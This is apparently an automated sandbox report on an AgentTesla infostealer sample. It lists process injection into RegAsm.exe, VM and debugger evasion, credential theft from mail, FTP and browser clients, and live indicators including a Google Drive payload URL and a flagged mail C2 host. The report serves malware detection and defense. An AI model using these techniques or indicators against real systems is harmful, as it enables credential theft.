            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exe, 0000000B.00000002.30184481839.0000000000CC0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1YSKFLBI29LIB1VUTRMSRHRKGJF8NUMBX
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25720283371.0000000002240000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25720283371.0000000002240000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30184481839.0000000000CC0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25719276817.000000000060D000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2624Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9954
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeSystem information queried: ModuleInformation
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25720283371.0000000002240000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: RegAsm.exe, 0000000B.00000002.30184481839.0000000000CC0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 0000000B.00000002.30186051316.0000000000E32000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25720283371.0000000002240000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30184481839.0000000000CC0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25719276817.000000000060D000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000002.25722324833.0000000004C49000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: RegAsm.exe, 0000000B.00000002.30187602352.00000000027C9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00746958 KiUserExceptionDispatcher,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A30000
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe'
            Source: RegAsm.exe, 0000000B.00000002.30187145181.0000000001370000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 0000000B.00000002.30187145181.0000000001370000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 0000000B.00000002.30187145181.0000000001370000.00000002.00020000.sdmpBinary or memory string: rProgram Manager
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1940, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1940, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1940, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1Credentials in Registry1Security Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            tccinfaes.com3%VirustotalBrowse
            mail.tccinfaes.com11%VirustotalBrowse
            x1.i.lencr.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://mail.tccinfaes.com11%VirustotalBrowse
            http://mail.tccinfaes.com100%Avira URL Cloudmalware
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://x1.i.lencr.org/0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://rpZocA.com0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/p0%Avira URL Cloudsafe
            http://x1.i.lencr.org/o0%Avira URL Cloudsafe
            http://Y8B3f1kpIES.net0%Avira URL Cloudsafe
            http://tccinfaes.com0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://Y8B3f1kpIES.nett-0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0)0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tccinfaes.com
            188.93.227.195
            truetrueunknown
            drive.google.com
            172.217.168.46
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.186.33
              truefalse
                high
                mail.tccinfaes.com
                unknown
                unknowntrueunknown
                x1.i.lencr.org
                unknown
                unknownfalseunknown
                doc-0g-7s-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5biaf70slhogar9caibgbbnhqpn/1634141175000/01707528263340534167/*/1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://doc-0g-7s-docs.googleusercontent.com/RegAsm.exe, 0000000B.00000002.30185888032.0000000000E0F000.00000004.00000020.sdmpfalse
                      high
                      http://mail.tccinfaes.comRegAsm.exe, 0000000B.00000002.30198135256.000000001DD1F000.00000004.00000001.sdmptrue
                      • 11%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://127.0.0.1:HTTP/1.1RegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://x1.i.lencr.org/RegAsm.exe, 0000000B.00000002.30186051316.0000000000E32000.00000004.00000020.sdmp, RegAsm.exe, 0000000B.00000002.30185888032.0000000000E0F000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.11.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://DynDns.comDynDNSRegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://rpZocA.comRegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5biRegAsm.exe, 0000000B.00000003.25691001658.0000000000E54000.00000004.00000001.sdmpfalse
                        high
                        http://cps.letsencrypt.org0RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://drive.google.com/RegAsm.exe, 0000000B.00000002.30185550528.0000000000DC8000.00000004.00000020.sdmpfalse
                          high
                          http://x1.c.lencr.org/0RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.i.lencr.org/0RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.i.lencr.org/pRegAsm.exe, 0000000B.00000002.30186637038.0000000000EA8000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.i.lencr.org/oRegAsm.exe, 0000000B.00000002.30186637038.0000000000EA8000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://Y8B3f1kpIES.netRegAsm.exe, 0000000B.00000002.30198324847.000000001DD45000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000003.26630972556.0000000000EC1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tccinfaes.comRegAsm.exe, 0000000B.00000002.30198135256.000000001DD1F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://doc-0g-7s-docs.googleusercontent.com/docs/secure%idRegAsm.exe, 0000000B.00000003.25696520194.0000000000E57000.00000004.00000001.sdmpfalse
                            high
                            http://r3.o.lencr.org0RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000B.00000002.30197114429.000000001DC4E000.00000004.00000001.sdmpfalse
                              high
                              http://Y8B3f1kpIES.nett-RegAsm.exe, 0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://r3.i.lencr.org/0)RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              172.217.168.46
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              188.93.227.195
                              tccinfaes.comPortugal
                              8426CLARANET-ASClaraNETLTDGBtrue
                              142.250.186.33
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:1648
                              Start date:13.10.2021
                              Start time:18:03:43
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 13m 0s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:ZAM#U00d3WIENIE.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:22
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.evad.winEXE@4/3@4/3
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                              • TCP Packets have been reduced to 100
